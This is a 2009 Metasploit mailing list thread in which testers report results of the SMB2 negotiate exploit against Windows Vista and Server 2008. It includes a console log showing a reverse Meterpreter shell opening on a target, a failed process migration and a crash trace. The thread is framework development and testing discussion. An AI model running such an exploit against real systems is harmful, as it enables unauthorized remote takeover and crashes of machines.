Metasploit mailing list archives
Metasploit 3.3 Development Updates
From: skysbsb at gmail.com (David Gomes)
Date: Tue, 29 Sep 2009 13:08:22 -0300
I have tried against Windows Vista and successfully exploited the vulnerability.
However, I can't migrate to another process, and I can't exploit this same
vulnerability twice.
msf exploit(smb2_negotiate_func_index) > exploit
[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.0.55:4444 -> 10.10.0.38:64969)
meterpreter > ps
Process list
============
3952 Explorer.EXE C:\Windows\Explorer.EXE
...
meterpreter > migrate 3952
[*] Migrating to 3952...
^C[-] Error while running command migrate:
meterpreter > ps
[-] Error running command ps: undefined method `write' for nil:NilClass
/pentest/exploits/framework3/lib/rex/socket/ssl_tcp.rb:97:in `write'
/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'
/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response'
/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:69:in `send_request'
/pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:216:in `get_processes'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:190:in `cmd_ps'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `call'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `run'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/pentest/exploits/framework3/lib/msf/base/sessions/meterpreter.rb:203:in `_interact'
/pentest/exploits/framework3/lib/rex/ui/interactive.rb:48:in `interact'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/core.rb:1007:in `cmd_sessions'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter > exit
msf exploit(smb2_negotiate_func_index) > exploit
[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Exploit completed, but no session was created.
On Tue, Sep 29, 2009 at 11:02 AM, Danilo Nascimento <danilo.nascimento.c at gmail.com> wrote:
> I can't exploit VMs in VirtualBox against Windows Server 2008 Enterprise/Standard (no updates) and Windows Vista Business en SP1 in an x86 host and guest OS. I've tried enabling/disabling the PAE/NX option, but a BSOD occurred when I ran the exploit. Which VM application are you using? When I have some free time I'll test in VMware ESXi and Xen.
>
> This exploit works fine against physical machines (Vista SP1 and Windows Server 2008) for me; the problem is that I can't migrate to another process (Explorer.exe) and I can exploit only once.
>
> Danilo Nascimento
>
> On Tue, Sep 29, 2009 at 9:01 AM, HD Moore <hdm at metasploit.com> wrote:
>> On Tue, 2009-09-29 at 12:42 +0200, Giorgio Casali wrote:
>>> Unfortunately I tried it against a Vista SP2 Enterprise and the exploit failed, while on a Vista SP2 Ultimate I ended up with a BSOD. Any idea where I should look into?
>>
>> We're seeing reports of it failing about 50/50 with physical machines and working almost always with VMs - either way we need to dig into it and do a little more work. Thanks for the feedback!
>>
>> -HD
>> _______________________________________________
>> https://mail.metasploit.com/mailman/listinfo/framework
--
David Gomes Guimarães,
Computer Science undergraduate - UFG,
Intern in the networking area - CERCOMP/UFG.
